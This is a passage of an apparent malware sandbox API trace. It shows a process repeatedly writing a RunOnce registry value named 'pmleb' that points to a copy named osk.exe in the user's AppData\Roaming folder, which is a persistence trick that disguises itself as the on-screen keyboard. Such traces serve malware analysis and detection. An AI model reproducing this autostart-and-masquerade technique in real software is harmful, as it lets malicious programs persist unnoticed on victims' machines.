lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.580] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.580] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.580] RegCloseKey (hKey=0x280) returned 0x0 [0082.580] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.580] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.580] SetTimer (hWnd=0x20280, nIDEvent=0x20f9, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f9 [0082.581] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.592] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.592] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.592] KillTimer (hWnd=0x20280, uIDEvent=0x20f9) returned 1 [0082.592] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.592] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.592] IUnknown:Release (This=0x787518) returned 0x1 [0082.593] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.593] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.593] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.593] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.593] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.593] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.593] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.593] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.593] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.593] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7e [0082.593] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.593] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7f [0082.593] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.594] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7e [0082.594] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.594] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.594] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.594] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.594] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.594] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.594] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.595] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.595] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.595] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.595] RegCloseKey (hKey=0x280) returned 0x0 [0082.595] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.595] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.595] SetTimer (hWnd=0x20280, nIDEvent=0x20fa, uElapse=0xa, lpTimerFunc=0x0) returned 0x20fa [0082.595] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.607] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.607] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.608] KillTimer (hWnd=0x20280, uIDEvent=0x20fa) returned 1 [0082.608] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.608] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.608] IUnknown:Release (This=0x787518) returned 0x1 [0082.608] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.608] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.608] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.608] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.609] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.609] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.609] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.609] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.609] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.609] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7f [0082.609] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.609] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x80 [0082.609] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.610] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7f [0082.610] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.610] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.610] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.610] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.610] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.610] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.610] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.610] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.610] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.611] RegCloseKey (hKey=0x280) returned 0x0 [0082.611] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.611] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.611] SetTimer (hWnd=0x20280, nIDEvent=0x20fb, uElapse=0xa, lpTimerFunc=0x0) returned 0x20fb [0082.611] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.629] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.629] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.629] KillTimer (hWnd=0x20280, uIDEvent=0x20fb) returned 1 [0082.630] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.630] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.630] IUnknown:Release (This=0x787518) returned 0x1 [0082.630] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.630] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.630] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.630] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.630] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.630] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.630] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.630] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.630] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.631] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x80 [0082.631] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.631] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x81 [0082.631] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.631] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x80 [0082.632] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.632] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.632] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.632] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.632] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.632] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.632] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.632] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.632] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.632] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.632] RegCloseKey (hKey=0x280) returned 0x0 [0082.632] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.632] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.632] SetTimer (hWnd=0x20280, nIDEvent=0x20fc, uElapse=0xa, lpTimerFunc=0x0) returned 0x20fc [0082.633] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 